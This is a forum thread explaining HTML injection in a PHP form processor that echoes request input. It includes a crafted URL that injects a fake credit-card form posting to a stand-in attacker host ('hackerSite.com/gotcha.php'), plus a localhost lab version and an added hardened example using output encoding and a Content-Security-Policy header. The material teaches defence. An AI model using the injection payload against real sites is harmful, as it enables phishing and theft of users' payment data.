Last Post by veedeoo
0

I totally agree with GliderPilot. Most hackers are not really interested in breaking the target site. What they are really after is stealing information from the user.

Allow me to give you the very basic example and vulnerability demonstration of the form.

Let's say we have a form on our site. I will be using the weakest type of form implementation I have ever seen from askers here on Daniweb. Something like this:

    <form action="hackme.php" method="request">
        <label>Type Your Name</label>
        <input type="text" name="name">
        <br/>
        <textarea name="comment"></textarea>
        <br/>
        <input type="submit" name="submit" value="submit"/>
    </form>

and the form processor for the above form is written like this...

    if(isset($_REQUEST['submit'])){

        echo $_REQUEST['name'];
        echo '<br/>';
        echo $_REQUEST['comment'].'<br/>';

        }

The hacker will visit your site and look at the HTML source of your form page. He will be able to get the information about your form processor, hackme.php, and the type of action used, request.

The hacker will then test if your site can be injected by pasting this to the browser.

http://yourdomain.com/hackme.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action=http://hackerSite.com/gotcha.php method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

The hacker will then check if the form injected on your form will be shown on the page. If it is, they generate links to your site's form processors. The unsuspecting users will then type in their info, and the injected form will be processed on the hacker's site.

Try this on your localhost. Create a file named hack.php and paste the code below.

    <?php

    $form = '<form action="hack.php" method="request">
             <label>Type Your Name</label>
             <input type="text" name="name">
             <br/>
             <textarea name="comment"></textarea>
             <br/>
             <input type="submit" name="submit" value="submit"/>
             </form>';

    if(isset($_REQUEST['submit'])){

        echo $_REQUEST['name'];
        echo '<br/>';
        echo $_REQUEST['comment'].'<br/>';

    }
    else{
        echo $form;
    }

Create another file called hacked.php and paste the code below.

    <?php

    if(isset($_POST['submit'])){

        echo $_POST['cc'].'<br/>';

    }

Open your favorite browser and paste the injection codes below.

localhost/hack.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action='localhost/hacked.php' method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

Hit enter, and the hack.php page should create the injected form asking for a credit card number. Now type any number in the input and hit submit. That should take you to hacked.php.

The example above is pretty classic, but any unsuspecting new web developer can easily overlook this type of vulnerability.

Edited by veedeoo: info added.
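
Added example (not part of veedeoo's post): the echo from hack.php placed next to an output-encoded version, both run over a constructed copy of the injection string shown above. The function names render_unsafe and render_safe, the switch to POST, and the Content-Security-Policy header are assumptions of this example.

```php
<?php
// Added example, not from the original post. render_unsafe() mirrors the
// thread's hack.php; render_safe() is a hypothetical hardened replacement.

function render_unsafe(array $in): string
{
    // Same behaviour as the posted processor: input is echoed as markup.
    return $in['name'] . '<br/>' . $in['comment'] . '<br/>';
}

function render_safe(array $in): string
{
    $out = '';
    foreach (['name', 'comment'] as $field) {
        $value = $in[$field] ?? '';
        if (!is_string($value)) {   // name[]=x arrives as an array
            $value = '';
        }
        // Encode & < > " ' so the browser renders the value as plain text.
        $out .= htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br/>';
    }
    return $out;
}

// Constructed sample input, modelled on the injection string in the post.
$sample = [
    'name'    => 'hello Client <br/>Please Enter Your Credit Card Below<br/>',
    'comment' => '<form action=http://hackerSite.com/gotcha.php method=post><input type=text name=cc>',
    'submit'  => 'submit',
];

if (PHP_SAPI === 'cli') {
    // Command-line run: print both renderings for comparison.
    echo "unsafe: ", render_unsafe($sample), "\n";
    echo "safe:   ", render_safe($sample), "\n";
} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    // Read $_POST, not $_REQUEST, so a crafted link alone cannot fill the fields.
    // form-action 'self' tells the browser to refuse form posts to other origins.
    header("Content-Security-Policy: default-src 'self'; form-action 'self'");
    echo render_safe($_POST);
}
```

Run from the command line, the unsafe line still contains a live form tag, while the safe line shows it as &lt;form ...&gt; text that the browser will display instead of render.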

0

I just want to add that my demonstration will work even on an upload form. So, be careful if your site allows users to upload. You need to screen those files to see whether they are allowed or not. Otherwise, malicious scripts can be uploaded to your site.
